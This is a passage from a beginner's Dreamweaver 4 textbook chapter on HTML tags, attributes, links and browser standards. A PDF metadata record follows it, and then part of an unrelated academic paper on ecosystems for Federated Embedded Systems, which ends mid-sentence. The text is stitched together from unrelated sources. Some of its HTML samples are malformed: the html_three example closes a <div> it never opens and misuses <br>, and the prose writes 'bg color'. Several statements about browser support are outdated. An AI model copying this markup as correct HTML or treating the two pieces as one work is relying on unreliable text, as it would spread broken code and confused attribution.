Explorer). Either way, it means the same thing: it identifies to the server exactly where the files you are requesting can be found. Those addresses are called universal resource locators (URLs). As you’ll see when you start working with Dreamweaver, web site managers (or webmasters) have a lot to do with keeping the files and all the supporting <table> <thead> <tr> <th>Domain Suffix</th> <th>Domain Type</th> </tr> </thead> <tbody> <tr> <td>.com</td> <td>Commercial, for-profit web site</td> </tr> <tr> <td>.org</td> <td>Nonprofit organization</td> </tr> <tr> <td>.gov</td> <td>Government agency</td> </tr> <tr> <td>.net</td> <td>Internet service provider</td> </tr> <tr> <td>.mil</td> <td>Military</td> </tr> <tr> <td>.edu</td> <td>Educational institution</td> </tr> <tr> <td>.k12</td> <td>Kindergarten through high school</td> </tr> </tbody> </table> Table 1-1 Common Domain Names on the World Wide Web assets of their web pages organized and in proper working order. As a client of a browser program, all you really care about is getting the page to load quickly and properly and getting to the information you want to see. Do you remember the first time you used the Internet? You probably were fascinated by how easy it was to move from one page to another, all with the click of a mouse. It’s no accident that the term “web surfing” was coined as a way to describe the experience of moving effortlessly from page to page. What makes all that possible? Again, it’s all controlled by the instructions written into the code. One of the things that makes HTML so valuable is its ability to insert links (or hyperlinks) in each page. In the same way that HTML allows a browser to display images, it can also create instructions to go to another web page or another section of a page when the user clicks their mouse on an image or string of text. Without this ability, web pages would be static, immovable objects—far different from the dynamic and interactive experience of the Web today. In a nutshell, the Internet is simply (simply!) a huge worldwide interconnected network of computers, all using a common language, that allows users to retrieve information stored on remote computers, and display it on their computers at home, work, or school. This is all done through the magic of a programming language, HTML, that lets web page designers insert images, text, sounds, and other objects into their pages, through the browser programs that read the instructions in the code and display the results on the user’s computer. Hmmm. When stated that way, it doesn’t seem hard at all, does it? And, as you’ll see in the next section, gaining a basic understanding of HTML isn’t all that difficult either! 1-Minute Drill - What is the basic function of a web browser? - Define the term web site. Getting a Handle on HTML Just saying the words “programming language” to some people can cause their eyes to glaze over and their senses to go numb. Other people are fascinated by the challenges presented by learning to program computers and by sorting out all the instructions necessary to get a computer to perform the way they want it to. Whether you’re a natural programmer or not, however, you need a basic understanding of HTML to go very far as a web designer. Although Dreamweaver (and Fireworks, as you’ll see) will certainly do the majority of the programming for you, by gaining an understanding of what’s going on under the hood of your web page, you’ll have a better chance of tracking down problems and getting them corrected when something isn’t working just right. You’ll also see as you work with Dreamweaver that you can save yourself a lot of work by going directly to the point on your page where you want to do something. To do that, you need to know about tags. **HTML Tags** You'll start by looking at what a page displayed in its raw HTML state looks like. If you haven’t done so yet, download and unzip the files located in module_one.zip at www.osborne.com. After you unzip the files, use your browser to open the file called html_one.htm. After your browser displays the page, select on View | Page Source (for Netscape), or View Source (for Internet Explorer). You should see something like this: ```html <html> <head> <title></title> </head> <body>This is a very simple web page. </body> </html> ``` while your browser displays this: ``` This is a very simple web page. ``` So what’s going on here anyway? Why did it take so much code to display one little sentence? And what’s with all of those left and right arrow brackets in the code? Let’s take a look at that string of code and decipher it. **Hint** You’ll notice that the filenames throughout the book use the underscore symbol ( _ ) to separate words. Although modern computer operating systems can easily deal with filenames that have spaces in them, not all servers operate correctly when they come across a space. For that reason, you won’t see any spaces in exercise filenames or in files that you’ll create. The first thing to understand about HTML is that it is written in a series of commands known as *tags*. Tags are the commands written by the programmer (or by Dreamweaver or another web authoring program) that tell the browser what to do. Take a look at the tags in the preceding example: ```html <html> <head> <title></title> </head> <body>This is a very simple web page.</body> </html> ``` Notice first of all that all the tags are written as pairs, just as parentheses are always written in pairs (like this). And, just as you need opening and closing parentheses, an opening tag and a closing tag are almost always necessary. Every web page begins and ends with the `<html>` tag. This lets the browser know that it must process the page as an HTML or web document instead of, say, a word processor document or an image file. The brackets are there to let the browser know that a tag is enclosed and that certain actions are expected. Finally, notice that the final (closing) `</html>` tag adds a forward slash inside the left arrow bracket, which lets the browser know that it should stop processing, or close, that tag. Next, you see the `<head>` tag and, enclosed within it, the `<title>` tag. The `<head>` tag tells the browser that the information inside it goes at the top, or head, of the document, and the `<title>` tag is where the information about the title of the web page is displayed. In the first example, your browser calls this an “Untitled Document” because no information is enclosed by the `<title>` tag. Now, open the file called html_two.htm from the exercise files and you’ll see that a title has been added to the page. Viewing the source of the page reveals that more information has been added to the HTML in the example page—the words “A Simple Web Page” enclosed by the <title> tags. ``` <html> <head> <title>A Simple Web Page</title> </head> <body>This is a very simple web page. </body> </html> ``` **HTML Attributes** Take a look at another example. Open html_three.htm on your browser and look at its source, shown here: ``` <html> <head> <title>A Simple Web Page</title> </head> <body bgcolor="#CCFFCC"> <br> </div align="center">This is a very simple web page.</br> </body> </html> ``` Notice that one new tag, the <div> tag, was added. But something else has been added—another set of instructions inside the left and right bracket arrows that enclose the tags. Did you notice the difference when you first opened the practice file? The page background is now pale green and the text has been centered in the page. If you look at the code, you can probably guess that bg color="CCFFCC" is the code to make the background color that shade of green. And if you look closely at the command inside the <div> tag, you see the added instructions to align="center". These added instructions are known as **attributes**, and they are used to do things such as change the color of text; change the alignment of text, paragraphs, and images; change the background color; or insert an image in the background of the page. As Wendy Willard describes in her excellent book, *HTML: A Beginner’s Guide* (Osborne/McGraw-Hill, 2001), you can think of the tags in a web page as the ice cream in an ice cream sundae, while the attributes are all the toppings. Tags provide structure and organization to your pages while attributes make them tastier! Dreamweaver 4 Fireworks 4 Studio: A Beginner’s Guide Take a look at another example. Open html_four.htm in your browser. You can see a number of attributes at work here. The text has been changed quite a bit—different colors have been added, sizes have been changed, and bold and italic styles have been added. Also, a background image has been added to the page, and the final result is as you see in Figure 1-3. The source code reveals that what’s really been done is that a number of tags have been changed by inserting attributes within them. The attributes in the source code are underlined so that you can locate them more easily. You’ll quickly notice that while the way that HTML works isn’t really all that complicated, by the time you look at the code for a complex page, you might have trouble seeing the forest for the trees. Don’t worry! Dreamweaver is going to make this all much simpler for you. ```html <html> <head> <title>A Simple Web Page</Title> </head> <body background="grayparchment.gif"> <div align="center"> <p><font color="#0000FF" size="7">This</font><font color="#0000FF" size="5">is a <font color="#FF0000">very</font> <b>simple</b> <i>Web</i><font size="7">page</font>.</font> </p> <p><img src="images/simpleimage.gif" width="299" height="122" > </p> <P><a href="http://www.osborne.com">Visit Osborne Publishing.</a></p> </div> </body> </html> ``` What do you notice about the way the attributes are written? If you look closely, you’ll see that they all have a few things in common: - Attributes are always inside the tag (between the opening and closing tags) that they modify - The command for the attribute (color means we want to change the color, for instance) comes before an equal sign. Every attribute needs that equal sign! - The value of the attribute comes after the equal sign and contains the information you want applied. You also see two attributes that control the images displayed in your page. The first is background, and the second is src. One very important note about images: Your code has to tell the browser not only what the image is—its name and size—but also where the image is. Notice that the background attribute is different from the src attribute. It only lists the name of the file that is used for the background on your page, because the image is in the same folder as the HTML file itself: ```html <body background="grayparchment.gif"> ``` Because no other information is provided, the browser assumes that this image can be found in the same location as the HTML file itself. --- **Figure 1-3** The results of the HTML code in html_four **Hint** A quick note about colors. On the preceding example web page, the word “This” is blue. Why does the attribute for that word list it as “#0000FF”? Couldn’t you just type `blue` instead? Actually, you could, and you’d get the same color. But what if you wanted a grayish-green blue color? To get more-specific colors, you need more-specific instructions, so when that first consumer browser was developed by Netscape, a way had to be developed to display a variety of colors—all on different computers that might have different settings. For that reason, a list of 216 “Web safe” colors was developed, written in a type of code called *hexadecimal*. This code uses letters and numbers to specify exactly which colors are to be displayed by your browser. Color is discussed in more detail in Module 4. Notice that the background attribute is different from the src attribute. It only lists the name of the file that is used for the background on your page, because the image is in the same folder as the HTML file itself: Now, look at the SRC code: ```html <p><img src="images/simpleimage.gif" width="299" height="122"> </p> ``` Notice that “images/” comes before the filename. In this case, your image is in a different folder (named images) than the source code, and you have to give the browser more specific information on where to find it. As you’ll see in the next module, it’s very important to plan the layout of your site so that you can easily find and file the pictures and other resources you want to use. Otherwise, you might end up with the dreaded (and unprofessional) broken image link symbol on your otherwise beautiful web page. The last attribute to discuss is the `<a href>` combination that you see near the bottom of the sample code. This is the place where you can insert a link into your page. Again, notice how it comes before the words it modifies (Visit Osborne Publishing) and that it is very specific in nature. While it’s getting increasingly common for users to just type a few words into the location bar of their browser and zoom off to a website, when you insert a hyperlink, you need all the information included, including the information that specifies you want your files transported using a process known as Hypertext Transfer Protocol (http://)—the web protocol for linking one page with another. **Hint** The hyperlink in our sample is called an *absolute* link because it is outside the website you’re currently in. Absolute links always require the entire URL. *Relative* links, or those within your own site, can be linked by filename, as you’ll see in Module 5. One other type of tag that hasn’t been discussed yet is known as a *metatag*—a specialized tag that is located within the head of pages and that provides hidden information about the page, its author, and its contents. You’ll see when working with Dreamweaver that this is one of the ways that you can be sure you get visitors to your web pages, because the information inside your metatags is often what search engines actually search for. Right now, you just need to know that HTML has that capability. And, of course, HTML has many other capabilities as well, but for right now, understanding how tags and attributes work in combination with each other is all you actually need to know about HTML. Table 1-2 lists the most common tags that you’re likely to see when working with Dreamweaver. Module 1: Fundamentals of the World Wide Web **Tag** - `<a href="URL">`: Creates a hyperlink to the specified URL - `<b>`: Bolds text - `<blockquote>`: Indents text left and right - `<body>`: Defines the visible portion of the web page - `<br>`: Creates a line break - `<font>`: Describes the font (text style) to be used - `<form>`: Creates a form - `<frame>`: Defines a single part of a framed web page - `<frameset>`: Defines a set of frames in a web page - `<h1>`: The largest headline-styled text - `<h6>`: The smallest headline-styled text - `<head>`: Defines information and instructions that do not appear on the page itself - `<html>`: Defines the file as an HTML document - `<hr>`: Inserts a horizontal line (rule) - `<i>`: Creates italic text - `<img>`: Inserts an image - `<ol>`: Creates a numbered (ordered) list - `<p>`: Formats a block of text as a separate paragraph - `<table>`: Creates a table - `<td>`: Defines table divisions—separate cells in a table - `<th>`: Creates a header for a table - `<title>`: Describes the text to be displayed in the browser title bar - `<tr>`: Defines table rows **Attributes** - `<body background="imagename">`: Sets the image to be used as a page background - `<body bgcolor=?>`: Sets the page background color - `<body text=?>`: Sets text color in the body of a page - `<div align=?>`: Used to format blocks of text - `<font color=?>`: Sets the color of text - `<font size=?>`: Sets the size of text - `<table border=?>`: Sets the width of the border around a table - `<table width=# or %>`: Sets the width of a table as an absolute number of pixels or as a percentage of the page - `<tr align=?>`: Sets alignment of individual cells **Table 1-2** Basic HTML Tags and Attributes 1-Minute Drill - Describe the function of HTML tags. - Describe the function of HTML attributes. - What two items of information must be included when inserting an image in a web page? The Present and Future of HTML The development of the Internet has happened in an amazingly short period of time. Along with this rapid development, an incredibly competitive marketplace has developed in which those who develop the latest and greatest Internet capabilities for their browsers can quickly overtake and dominate their competitors. The problem is that one browser may not display code written for another flavor of browser, and visa versa. HTML standards quickly became an issue of great concern to developers worldwide as growing differences in browser technologies indicated that entire web sites soon would need to be developed for each browser platform. The World Wide Web Consortium (W3C, at www.w3c.org) was formed as a means of addressing these growing problems. The W3C is the organization responsible for ensuring that a common set of HTML standards is developed and maintained, and that the capabilities of those standards are widely available to webmasters. So, with a common set of standards, developers should have no problems at all, right? Unfortunately, that isn’t the case. Remember that the work of displaying your pages is done at the viewer’s computer and by the browser they have installed. Currently, all browsers handle the HTML standards developed by the W3C through version 2—but, as of this writing, the W3C has developed standards through version 4.01! Furthermore, neither Netscape Navigator nor Internet Explorer, even in their latest versions, supports all the tags in HTML 4.01, or they interpret the code differently. This can cause web authors and developers real headaches as they try to construct pages that will display properly no matter what type of browser is being used. As you’ll see in Module 2, the result of all this is that you need to have a very good understanding of who will be viewing your pages, what kind of browser they are likely to have, and how this impacts the features you want to make available through your code. Module 1: Fundamentals of the World Wide Web As a sophisticated web authoring tool, Dreamweaver 4 includes ways to address browser compatibility. These compatibility problems are discussed throughout this book, and you'll quickly come to appreciate the variety of ways in which Dreamweaver enables you to test your project. **Hint** To check for browser compatibility, you need to install at least the two most common browser programs—Netscape Navigator and Internet Explorer. They can be downloaded at www.netscape.com and www.microsoft.com, respectively. What You See Is What You Get After you understand the basics of what HTML does and how it interacts with your browser, it won't be nearly as intimidating. In fact, in the early days of the Internet, almost all web pages were created by hand—that is, raw code was written in its HTML text form. Many of these early pioneers taught themselves how to do their coding by carefully studying the code they saw on web pages and emulating (okay, sometimes copying) it. To this day, plenty of hard-core HTML junkies won't build their web pages any other way. For the rest of us, those who see a huge page with streams of hard-to-follow commands and quickly feel overwhelmed, Dreamweaver offers the ability to design pages in a much friendlier environment, one that enables you to actually see what's going to be on your page as you work. Dreamweaver enables you to design in an almost real-time environment, and is the best software available for those who want to work in this what you see is what you get (WYSIWYG) mode. With Dreamweaver, you can apply elements to your pages, change the text size and style, insert images, and control the overall look of your pages without ever looking at HTML at all. In addition, Dreamweaver provides clean, standards-driven, code that can easily be modified in its raw code directly within the program. Version 4 has even added the capability of viewing two simultaneous windows, displaying the design version of the page in one window, while the code itself is displayed (and automatically updated) in its pure form, as shown in Figure 1-4. Dreamweaver calls this “round-trip” HTML because page authors can switch seamlessly between a code view and a design view without worrying about the program creating code that is not compatible with current standards. This may not seem important to you right now, but at some point in the process of becoming an accomplished web author and site developer, you're going to want to have access to options that are more easily created and modified in “raw” HTML. For the new author, or even someone who has previously done their entire HTML coding by hand, Dreamweaver also provides some other useful coding help: - Automatically corrects overlapping and redundant tags and attributes - Highlights incorrect code and code that is not supported by current standards - Includes a comprehensive reference for HTML, JavaScript, and cascading style sheets (CSS) ### 1-Minute Drill - What organization maintains and establishes standards for HTML? - Describe how browser compatibility issues can impact web design. - The World Wide Web Consortium maintains and establishes the HTML standards. - Tags and attributes can be read and interpreted (or not read at all) by different browsers or even different versions of the same browser. Module 1: Fundamentals of the World Wide Web Project 1-1: Viewing Source Code Many web authors got their start in web design by doing something very simple—they looked at the code contained in other web pages through the View command in their browser. You can also learn a great deal about HTML and how tags and attributes are employed by examining the source code of web pages. You’ll start by looking at one of the world’s most popular sites, Yahoo! (www.yahoo.com). Yahoo! is an example of an Internet directory—specially constructed web pages filled with links to other sites listed by category. You can almost think of it as Yellow Pages for the Web. This section looks at both the page itself and the underlying code. Step-by-Step 1. Open Yahoo! in your browser and you’ll see a very tightly organized page with a huge number of hyperlinks, shown in Figure 1-5. 2. Choose View | Page Source (Netscape) or Source (Internet Explorer), and you’ll see the HTML code for that page, as shown in Figure 1-6. 3. Now identify some of the tags you see: - What tag do you find most often on this page? - What is the page title? - Does the page use tables to lay out its content? What tells the browser to develop the tables? - Do you see any tags you don’t recognize? Note Yahoo! uses a number of special HTML tags called cascading style sheets. These special formatting tags will be discussed in Module 8. 4. Next, visit a few of the following web sites: - www.osborne.com - www.nbci.com - www.microsoft.com - www.apple.com - www.zdnet.com On each of the sites, do the following: a. Locate the code for an image that is on the page. What is the name of the image? Is the image in the same folder as the main page? If it’s in another folder, can you identify the name of the folder that holds it? b. Try and locate special text attributes on the page. Do you find instances of the bold or italic tags? How about tags for text color? c. Notice how tables are used in the construction of the page. Can you identify the attributes that define the table and its contents? Figure 1-5 Yahoo! is one of the world’s most visited web sites Figure 1-6 Viewing the code for the Yahoo! home page Module 1: Fundamentals of the World Wide Web d. Look for tags and attributes listed on these pages that haven’t been discussed yet. Can you tell what they do? e. Look for a tag that is formatted like this: <!--some text in here-->. What do you think the purpose is of this kind of tag? f. Look at the exact same web site using both Internet Explorer and Netscape Navigator. Do you see any difference in how the two browsers display the page you’re viewing? What to Take Away Understanding HTML and how web pages are created is not an overwhelming chore. Just like with any craft, designing web pages requires patience and lots of practice. If you’re willing to put the time into learning the software, and then practice your skills using the projects in this book, you’ll find that within a very short time, you will be confidently building web pages and assembling them into well-defined web sites. It’s going to be a lot of fun—and you’ll get started in the next chapter by looking at web site planning and how you use Dreamweaver to build your site from the ground up. Mastery Check 1. What is the term to describe a web page’s address on the Internet? 2. Every web page begins and ends with what tag? 3. What is the function of this tag: <a href=“http://www.osborne.com”>? 4. What is the term used by Dreamweaver to describe its standards-based HTML code? 5. What is the difference between a relative link and an absolute link?
{"Source-Url": "http://books.mhprofessional.com/downloads/products/0072192607/0072192607_ch01.pdf", "len_cl100k_base": 7209, "olmocr-version": "0.1.49", "pdf-total-pages": 19, "total-fallback-pages": 0, "total-input-tokens": 38593, "total-output-tokens": 7972, "length": "2e12", "weborganizer": {"__label__adult": 0.0004360675811767578, "__label__art_design": 0.00618743896484375, "__label__crime_law": 0.0002639293670654297, "__label__education_jobs": 0.0282135009765625, "__label__entertainment": 0.0004227161407470703, "__label__fashion_beauty": 0.0003151893615722656, "__label__finance_business": 0.0008873939514160156, "__label__food_dining": 0.0004818439483642578, "__label__games": 0.0011386871337890625, "__label__hardware": 0.0013036727905273438, "__label__health": 0.0003097057342529297, "__label__history": 0.0005779266357421875, "__label__home_hobbies": 0.000438690185546875, "__label__industrial": 0.00037550926208496094, "__label__literature": 0.0014209747314453125, "__label__politics": 0.00014638900756835938, "__label__religion": 0.0009479522705078124, "__label__science_tech": 0.01416015625, "__label__social_life": 0.00024628639221191406, "__label__software": 0.218505859375, "__label__software_dev": 0.72216796875, "__label__sports_fitness": 0.00023472309112548828, "__label__transportation": 0.0003859996795654297, "__label__travel": 0.0005259513854980469}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 32453, 0.00548]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 32453, 0.82598]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 32453, 0.92297]], "google_gemma-3-12b-it_contains_pii": [[0, 305, false], [305, 2824, null], [2824, 3781, null], [3781, 6511, null], [6511, 7992, null], [7992, 10147, null], [10147, 11499, null], [11499, 13709, null], [13709, 15478, null], [15478, 17620, null], [17620, 19123, null], [19123, 21510, null], [21510, 23245, null], [23245, 25423, null], [25423, 28019, null], [28019, 28788, null], [28788, 30619, null], [30619, 31011, null], [31011, 32453, null]], "google_gemma-3-12b-it_is_public_document": [[0, 305, true], [305, 2824, null], [2824, 3781, null], [3781, 6511, null], [6511, 7992, null], [7992, 10147, null], [10147, 11499, null], [11499, 13709, null], [13709, 15478, null], [15478, 17620, null], [17620, 19123, null], [19123, 21510, null], [21510, 23245, null], [23245, 25423, null], [25423, 28019, null], [28019, 28788, null], [28788, 30619, null], [30619, 31011, null], [31011, 32453, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 32453, null]], "pdf_page_numbers": [[0, 305, 1], [305, 2824, 2], [2824, 3781, 3], [3781, 6511, 4], [6511, 7992, 5], [7992, 10147, 6], [10147, 11499, 7], [11499, 13709, 8], [13709, 15478, 9], [15478, 17620, 10], [17620, 19123, 11], [19123, 21510, 12], [21510, 23245, 13], [23245, 25423, 14], [25423, 28019, 15], [28019, 28788, 16], [28788, 30619, 17], [30619, 31011, 18], [31011, 32453, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 32453, 0.03462]]}
olmocr_science_pdfs
2024-11-26
2024-11-26
076d89ca3016be1cfe718a4376030adee1e4c973
ABSTRACT This paper discusses how Systems of Systems (SoS) can be constructed by linking together embedded computers in constituent systems to create complex but more flexible and adaptable systems. The approach of software system development is called Federated Embedded Systems (FES) and their revolved ecosystem of players is presented, aiming to ensure quality in engineering SoS. Ecosystems for Federated Embedded Systems (EcoFES) comprise a new area of research that scales component-based software development for embedded software into new dimensions. The proposed ecosystem dimension introduces an open, flexible and adaptable SoS architecture for improving the process of FES development. In the paper, we identify some architectural challenges and discuss the implications of scaling from a closed ecosystem to an open one, providing open collaboration and innovation in the context of FES. Categories and Subject Descriptors D.2.11 [Software Architectures]: Domain-specific architectures. General Terms Management, Performance, Design, Economics, Reliability. Keywords 1. INTRODUCTION The challenge of developing Systems of Systems (SoS) has received an increased attention from industry and the research community in recent years. SoS development is the process of combining dedicated complex systems for a specific target, i.e., developing high-quality complex systems in a rapid and efficient way. SoS are typically composed of software systems that are discovered, selected and composed at runtime. Each constituent system has a value on its own, even when used outside the SoS, may change over time and may be independently deployed and delivered by different providers. Software ecosystems provide a complementary organisational view to SoS development, which introduces roles and rules of interaction, collaboration and synergistic capabilities for its constituent systems [5]. It requires explicit modelling of roles in different organisations and the rules that govern their internal and external interactions with respect to each organisation, for instance, when an organisation collaborates with independent third-party organisations. Such ecosystems aim to offer added functionality, innovation, flexibility, openness, and adaptability through orchestrations and choreographies of multiple heterogeneous systems, as well as increased productivity and efficiency in development. Embedded systems (ES) are key components in many everyday systems, including automotive [3], home automation, energy, transportation, healthcare, and manufacturing [8]. External connectivity introduces a new dimension of technical challenges for ES manufacturers, as products become explicit configurations of subsystems developed by independent providers. As a consequence, these providers must introduce support and coordination for connected services in their product-lines, while contributing to satisfying ES specific constraints on the SoS level, such as real-time, limited resources and additional pre-defined platform technologies. The ES industry exemplifies a relatively closed market where a direct chain exists only between suppliers and manufacturers. Recent works discuss how players could benefit if their ecosystems, including their development organisations, processes and software assets, were more open [1, 3]. However, the business decision of a closed market to move towards open ecosystems, thus changing the overall structure and infrastructure of the industry, has considerable impact on the related organisations’ structure, processes and software assets. These effects, especially in the complex intersection of SoS and ecosystems, have not been analysed thoroughly in any previous work. An example in the automobile industry is the software standard AUTOSAR which is a component-based framework that only allows flexibility at design time. Recent research [1] opens up this model to allow addition of plug-in software, allowing third-party add-on developers, through certain interfaces, to access sensors and actuators. In this way, a SoS can be constructed by adding plug-in software to ES configurations, that together with a base system realise critical SoS functions. We refer to this class of system of embedded systems as Federated Embedded Systems (FES). The notion is closely related to Cyber-Physical Systems (CPS) consisting of networked systems relying on physical processes, computation and communication technologies to extend the capabilities of physical systems. The contribution of this paper is an analysis of Ecosystems for Federated Embedded Systems (EcoFES) which carries several novel challenges that motivate special consideration. We pin-point a number of challenges on the organisational, technical, and business architecture level. The identified challenges are primarily related to the ecosystems’ processes, methods, and tools. The organisation of the remainder of the paper is as follows. Section 2 describes the EcoFES concept, the motivation and its main benefits in detail. Section 3 describes the architectural challenges. Section 4 summarises related work. Finally, Section 5 describes on-going and future work and discusses our conclusions. 2. THE ECOFES CONCEPT The EcoFES roles and various layers are shown in Figure 1. It involves a combination of players (individuals and organisations) which make use or offer synergistic capabilities from a business, services and components perspective. The proposed structure promotes openness through collaboration, flexibility, innovation and adaptability for ES development, through the formation of federations. In order to best support collaborative development scenarios in the ecosystem, the identification of roles, strategies, processes, and resources need to be studied and orchestrated so that they co-evolve [9]. The EcoFES players (i.e., supplier, developer, end-user and manufacturer) will require a technical infrastructure to enable the formation and operation of these federations. For instance, end-users may use services that are provided by the manufacturer or may find the services offered by another player (e.g., a third-party developer or supplier) more attractive. In other scenarios, developers use internal or external APIs, frameworks, or Web services provided to the federation. This exemplifies that third-parties may provide new or refined business processes, services or components to the ecosystem. ![Figure 1. EcoFES Conceptualisation Schema.](image) Furthermore, from a SoS viewpoint, the software components that constitute the federation’s services may be enhanced by many different innovative technologies, for instance, open-source plugins. In addition, EcoFES services and components may be made available to third-party players in the ecosystem that develop new plug-in software components. 2.1 Motivation The motivation for conducting research in the context of EcoFES stems from the recent trends in software markets to open up for networked mass customisation and production [8]. Examples include apps for mobile devices, and software product-lines [2] that adopt an ecosystem approach and provide extended features to users. Failure to open up, according to Jansen et al. [8], causes decrease in sales, loss of jobs, jeopardises intellectual property and results to unhealthy markets. From an ES perspective we find several issues and concerns that motivate further investigation: - Identifying players, roles, rules and supporting processes, methods, tools, and the technical infrastructure, that cultivate an open, innovative and collaborative environment for next generation ES. - Forming ethical and democratic strategies that facilitate control, coordination and integration, release planning and project management, as well as evaluating alternative software architectures, development methods, reuse levels and make-or-buy options between manufacturers, suppliers and other third-party developers. - Forming principles based on state-of-the-art practices and the research frontier. This requires empirical data from current practices and research, including experiences from researchers and practitioners regarding FES development. 2.2 EcoFES Benefits The benefits of open ecosystems in the FES context include: - Creating better and smarter products, at lower costs and more efficiently. Collaboration promotes innovation and shares the costs of adopting the most recent technology. It minimises lead time for new products and development and maintenance costs may be amortised on multiple parties. The products have more flexible architectures and are thus more easily adapted to respond to change, even after the initial deployment. - Moving development closer to the markets. This will create an ecosystem that is more sensitive to market trends, thus more likely to offer products that are better aligned with market expectations and requirements, as well as better support recent mass customisation trends. - Creating a community for collaboration that attracts and locks-in new and existing players. It offers organisation, product and application platform sustainability, once players are enabled to work collaboratively and dynamically for longer periods rather than on only one product or on a project-basis. 3. ARCHITECTURAL CHALLENGES In this section we discuss the main challenges related to the EcoFES architecture. EcoFES combines several architectural views. Challenges are discussed reflecting the categories that we consider the most important: a) organisational, b) technical and, c) business. They are expressed and discussed from the particular viewpoint where dedicated ecosystems targeting specific markets participate in a larger federated ecosystem. 3.1 Organisational Challenges The organisational architecture involves several challenges. Firstly, the players and their roles need to be identified and classified within the EcoFES. New organisational structures and ways of working (protocols) are required with regards to processes and means of interaction used. New collaboration mechanisms need to be defined for developing, integrating and managing products throughout their life-cycle. For instance, by defining a key role in the ecosystem (e.g., the manufacturer) to make sure that the various technical challenges, some of which are discussed later, like dependability, interoperability, data management, architectural design, heterogeneity of components, life-cycle management and efficient coordination, are adequately addressed, is a way to tackle the overall complexity of aligning and supporting external and internal players’ collaborations. The manufacturer must also provide a certain level of tool/platform support, e.g., simulators, which can be understood and used by third-party software. developers to test their plug-ins without having access to all the details of the base product. This ensures that the manufacturer can maintain some control over the products. Thus, the organisational challenge includes designing and providing stable structures so that the business model can work efficiently, protect the interests/rights of all related players, ensure sustainability and ethical governance, and at the same time, satisfy the players’ overall goals. 3.2 Technical Challenges The technical challenges are identified in relation to the phase of development, i.e., a) initiation and definition, b) implementation, and c) integration and delivery. The main technical concerns are discussed below. 3.2.1 Initiation and Definition During the definition of the product the architecture subsumes traditional product-line software architecture. Thus, in terms of technical and procedural specifications, the EcoFES concept will need to tackle several challenges that cut across more than one system and components. The processes need to support building multiple complex units of distributed functionality as the systems developed in the case of ES. Thus, in terms of specifications, qualitative descriptions need to be supported and automated as much as possible. This will reduce risks and costs of modifying specifications later in the life-cycle. 3.2.2 Implementation Dependability is a key property for embedded and real-time systems. In an EcoFES, components and services will address cross-cutting, sometimes conflicting domains and be provided by different players. This triggers an abundance of challenges, involving composability, adaptability, flexibility, robustness and reliability of the processes and tools used. The particular type of required composability needs to be addressed in the service/component design, orchestration and choreography level. Adaptability and flexibility refer to offering explicit variability at different levels to respond to environment and domain specific requirements. Variability occurs in most concerns, including functionality and different quality concerns. An additional challenge at the definition level is to support mixed criticality. Support for real-time properties and physical resource constraints of ES require special attention at the implementation level. A common implementation platform that supports the SoS’s as well as its constituent parts’ functionalities must be established by the ecosystem. This introduces additional dependencies and increases architecture complexity. Quality attributes are inherently cross-cutting and in an EcoFES, the dependencies will cross-cut ecosystems and players. This will create several risks that must be mitigated at the implementation level of the EcoFES platform. Thus, such a platform needs to be dependable, i.e., support criticality, be continuously responsive and robust. Criticality relates to availability of the SoS, robustness to failure handling and system recovery, while reliability considers continuity and integrity of the services provided. Another challenge for the technical architecture is reusability, i.e., developing to support reuse and developing with reuse. This challenge requires that a reuse strategy is defined on the federation level. The strategy specifies the required level of reuse in each constituent ecosystem and provides adequate methodology to support synchronisation and coordination. In addition, dependencies between constituent ecosystems’ assets, such as software product-lines, software libraries, and toolkits should be made explicit. However, in collaborative environments such as EcoFES, reaching an agreement on reuse strategies will involve complex business strategy considerations and will be influenced by the business models players select. This, all together, make reuse a key challenge for successful implementation of EcoFES. 3.2.3 Integration and Delivery As the manufacturer is responsible for integration and systems testing at product delivery, the overall complexity and criticality of the products, add to the overall complexity of the process. Openness in collaboration to promote innovation is considered a major challenge, especially in the case of closed markets where a manufacturer requires control over products and processes considering them as core business assets and intellectual property. Finding ways to share knowledge and technology in a secure, trusted, collaborative and creative way is a fundamental challenge due to the lack of supporting framework and mechanisms that guarantee the controlled internal and external flow of information within and across organisations and to independent third-parties [7]. 3.3 Business Challenges 3.3.1 Analyse Competitive Landscape Identifying new and innovative business models for ES in the context of federated ecosystems involves several challenges. The EcoFES structures will be established in highly competitive landscapes, where players demand increase in connected systems and services, efficiency, productivity and quality, but also reduced costs, time-to-market, and delivery [7]. In many cases, such conflicting requirements need to be satisfied as the involved players come from different domains (e.g., manufacturers, suppliers, end-users). Additional barriers for a successful adoption of EcoFES include trust, conflicting business goals and strategies. Thus, a prerequisite for the successful formation of EcoFES is to study the players. This involves identifying their roles, policies, communication processes and tools, and aligning them with other players and their characteristics. A likely scenario for a specific EcoFES is to analyse multiple dimensions and define rules that mitigate risks connected to competition, negotiation, and licensing and ownership conflicts between the players [7]. 3.3.2 Formalise the Business Models A challenge that is subsequent to the analysis is the definition of business models that EcoFES should support. The models manifest the contracts negotiated and agreed to by current and future players. The models should be specified to ensure delivery of value, development of strategies to preserve economic health in the market, and formally serve players, their roles, and interactions. Jensen et al. [7] explain the challenges of formalising such an ecosystem, players need to realise their role, and manufacturers need to face risks such as opening their product interfaces, knowledge bases and source code to other parties. Thus, the formalisation of business rules that enforce the required openness to support open innovation while preserving the intricate properties specific to ES, such as real-time constraints and safety, is required. A novel challenge in this context is to 